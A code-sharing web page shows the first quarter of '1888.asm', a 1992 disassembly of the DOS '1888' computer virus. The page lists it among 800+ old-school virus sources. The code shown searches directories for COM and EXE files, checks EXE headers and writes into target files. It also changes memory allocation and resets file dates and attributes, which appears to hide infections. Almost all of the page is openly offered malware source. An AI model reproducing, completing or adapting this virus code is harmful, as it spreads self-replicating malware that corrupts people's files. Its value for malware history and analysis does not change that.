1888.asm
来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 1,924 行 · 第 1/4 页
ASM
1,924 行
PAGE 59,132
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;圹 圹
;圹 1888 圹
;圹 圹
;圹 Created: 28-Jul-92 圹
;圹 Passes: 5 Analysis Options on: none 圹
;圹 圹
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
d_0040_001C_e equ 1Ch
d_0040_004A_e equ 4Ah
d_8B38_0003_e equ 3 ;*
data_0012_e equ 12h
data_0016_e equ 16h
data_00A3_e equ 0A3h
data_00A7_e equ 0A7h
data_00A9_e equ 0A9h
data_00AB_e equ 0ABh
data_00AF_e equ 0AFh
data_00B3_e equ 0B3h
data_00B5_e equ 0B5h
d_9E01_0000_e equ 0 ;*
d_9E01_0002_e equ 2 ;*
d_9E01_0004_e equ 4 ;*
d_9E01_0008_e equ 8 ;*
d_9E01_0014_e equ 14h ;*
d_9E01_0016_e equ 16h ;*
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
1888 proc far
start:
jmp loc_0767
data_0103 db 20h
data_0104 dw 86C0h
data_0106 dw 18FCh
data_0108 dw 762h
data_010A dw 0
data_010C db '1888.COM', 0
db 00h, 00h, 00h,0A6h
data_0119 dw 25h
data_011B db 1
data_011C dw 760h
data_011E db 0
data_011F db 0
data_0120 dw 762h
data_0122 dw 760h
data_0124 dw 0FFFEh
data_0126 dw 5369h ; Data table (indexed access)
data_0128 dw 5369h
data_012A dw 4C97h
data_012C dd 9E010000h
data_0130 dw 7C8h
data_0132 db 8
data_0133 db 10h
data_0134 db 0
data_0135 db 10h
db 0, 0, 0, 0
data_013A db '\DANGER\1888'
db 20 dup (0)
data_015A db 'C:\', 0
db '*', 0
db 'NETWARE', 0
db 'LMS', 0
db 'MAUS', 0
db 'MDB', 0
db 'DOS', 0
db 'BASE', 0
db 'L', 0
data_0180 dw 160h
data_0182 db 0
data_0183 db 1
db 14h, 17h, 6Eh, 00h, 01h,0A9h
db 00h, 01h,0BFh
db 38h
data_018E db 2Ah
db 2Eh, 65h, 78h, 65h, 00h
data_0194 db 2Ah
db 2Eh, 63h, 6Fh, 6Dh, 00h
data_019A db 0
data_019B db 0
data_019C db 0
data_019D db 4
db 3Fh
db 7 dup (3Fh)
db 43h, 4Fh, 4Dh, 23h, 04h, 00h
db 0F3h, 31h, 0Dh, 4Dh, 18h, 68h
db 20h,0C0h, 86h,0FCh, 18h, 62h
db 07h, 00h, 00h
db '1888.COM'
db 00h, 00h, 00h, 00h,0A6h,0EAh
db 0AAh, 03h, 00h,0CCh,0AAh, 03h
db 60h, 07h, 00h, 40h, 05h, 00h
db 60h, 07h, 00h, 01h,0C8h, 01h
db 19h, 01h, 00h, 00h, 69h, 53h
db 69h, 53h, 61h, 06h, 9Dh, 04h
db 16h, 32h, 21h, 00h, 7Bh, 1Ah
db 12h, 32h,0ADh, 04h, 69h, 53h
db 12h, 32h,0DEh, 07h
1888 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_01F7 proc near
cmp data_011C,0
jne loc_0207 ; Jump if not equal
mov ax,760h
mov data_011C,ax
mov data_0120,ax
loc_0207:
mov al,data_011E
mov data_011F,al
mov ax,data_0120
mov data_0122,ax
inc data_0119
mov data_019C,0
mov data_019A,0
mov data_019B,0
retn
sub_01F7 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_0227 proc near
lea dx,data_0183 ; Load effective addr
xor al,al ; Zero register
mov ah,3Dh ; '='
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_ret_0239 ; Jump if carry Set
mov bx,ax
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_ret_0239:
retn
sub_0227 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_023A proc near
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dh=month
; dl=day, al=day-of-week 0=SUN
mov ah,dh
cmp cx,data_0130
je loc_0249 ; Jump if equal
add ah,0Ch
loc_0249:
sub ah,data_0132
mov data_011B,ah
mov data_0134,al
mov data_0133,dl
mov data_0132,dh
mov data_0130,cx
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dx=sec
mov data_0135,ch
retn
sub_023A endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_0269 proc near
mov ax,es
dec ax
push es
mov es,ax
mov ax,es:d_8B38_0003_e
mov data_012A,ax
pop es
mov bx,ax
sub bx,200h
mov ah,4Ah ; 'J'
int 21h ; DOS Services ah=function 4Ah
; change memory allocation
; bx=bytes/16, es=mem segment
mov bx,150h
mov ah,48h ; 'H'
int 21h ; DOS Services ah=function 48h
; allocate memory, bx=bytes/16
mov word ptr data_012C+2,ax
retn
sub_0269 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_028C proc near
push es
mov ax,word ptr data_012C+2
mov es,ax
mov ah,49h ; 'I'
int 21h ; DOS Services ah=function 49h
; release memory block, es=seg
mov ax,data_0128
mov es,ax
mov bx,data_012A
mov ah,4Ah ; 'J'
int 21h ; DOS Services ah=function 4Ah
; change memory allocation
; bx=bytes/16, es=mem segment
pop es
retn
sub_028C endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_02A5 proc near
push ds
mov ah,1Bh
int 21h ; DOS Services ah=function 1Bh
; get disk info, default drive
; al=sectors per cluster
; ds:bx=ptr to media ID byte
; cx=sector size, dx=clusters
cmp byte ptr [bx],0F8h
pop ds
retn
sub_02A5 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_02AF proc near
lea si,data_019D ; Load effective addr
mov di,si
xor dl,dl ; Zero register
mov ah,47h ; 'G'
int 21h ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
; ds:si=ASCIIZ directory name
mov cx,30h
mov al,0
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov cx,di
sub cx,si
lea di,data_013A ; ('\DANGER\1888') Load effective addr
mov al,5Ch ; '\'
stosb ; Store al to es:[di]
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
retn
sub_02AF endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_02D0 proc near
mov data_0182,0
lea bx,cs:[160h] ; Load effective addr
add bx,20h
mov data_0180,bx
sub bx,20h
lea dx,data_015A+4 ; ('*') Load effective addr
mov cx,33h
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_031F ; Jump if carry Set
loc_02F0:
lea di,data_019D ; Load effective addr
add di,1Eh
cmp byte ptr [di],2Eh ; '.'
je loc_0319 ; Jump if equal
mov si,di
mov cx,20h
mov al,0
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov cx,di
sub cx,si
mov di,bx
add bx,cx
cmp bx,data_0180
ja loc_031F ; Jump if above
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
inc data_0182
loc_0319:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_02F0 ; Jump if carry=0
loc_031F:
lea bx,cs:[160h] ; Load effective addr
mov data_0180,bx
retn
sub_02D0 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_0328 proc near
cmp data_0182,0
je loc_ret_034C ; Jump if equal
lea dx,data_013A ; ('\DANGER\1888') Load effective addr
mov ah,3Bh ; ';'
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
mov dx,data_0180
mov di,dx
mov ah,3Bh ; ';'
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
mov al,0
mov cx,20h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov data_0180,di
loc_ret_034C:
retn
sub_0328 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_034D proc near
mov ax,data_0104
and al,1Fh
cmp al,1Eh
retn
sub_034D endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_0355 proc near
lea dx,data_0194 ; Load effective addr
cmp data_011E,0
je loc_0364 ; Jump if equal
lea dx,data_018E ; Load effective addr
loc_0364:
mov cx,23h
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
retn
sub_0355 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_036C proc near
lea si,data_019D ; Load effective addr
add si,15h
lea di,data_0103 ; Load effective addr
mov cx,16h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
retn
sub_036C endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_037D proc near
pushf ; Push flags
mov cx,data_0104
or cl,1Fh
and cl,0FEh
mov dx,data_0106
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
lea dx,data_010C ; ('1888.COM') Load effective addr
xor ch,ch ; Zero register
mov cl,data_0103
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
popf ; Pop flags
retn
sub_037D endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_03A6 proc near
lea dx,data_010C ; ('1888.COM') Load effective addr
xor cx,cx ; Zero register
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
jc loc_ret_03BA ; Jump if carry Set
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
loc_ret_03BA:
retn
sub_03A6 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_03BB proc near
push ds
mov ax,word ptr data_012C+2
mov ds,ax
mov cx,100h
xor dx,dx ; Zero register
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
cmp word ptr ds:d_9E01_0000_e,5A4Dh
nop ;*ASM fixup - sign extn byte
je loc_03D6 ; Jump if equal
stc ; Set carry flag
jmp loc_0455
loc_03D6:
call sub_0457
push ax
mov ax,di
and ax,0Fh
mov cx,10h
xor dx,dx ; Zero register
sub cx,ax
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jnc loc_03EF ; Jump if carry=0
jmp short loc_0455
db 90h
loc_03EF:
mov si,ax
mov cx,100h
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_0455 ; Jump if carry Set
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?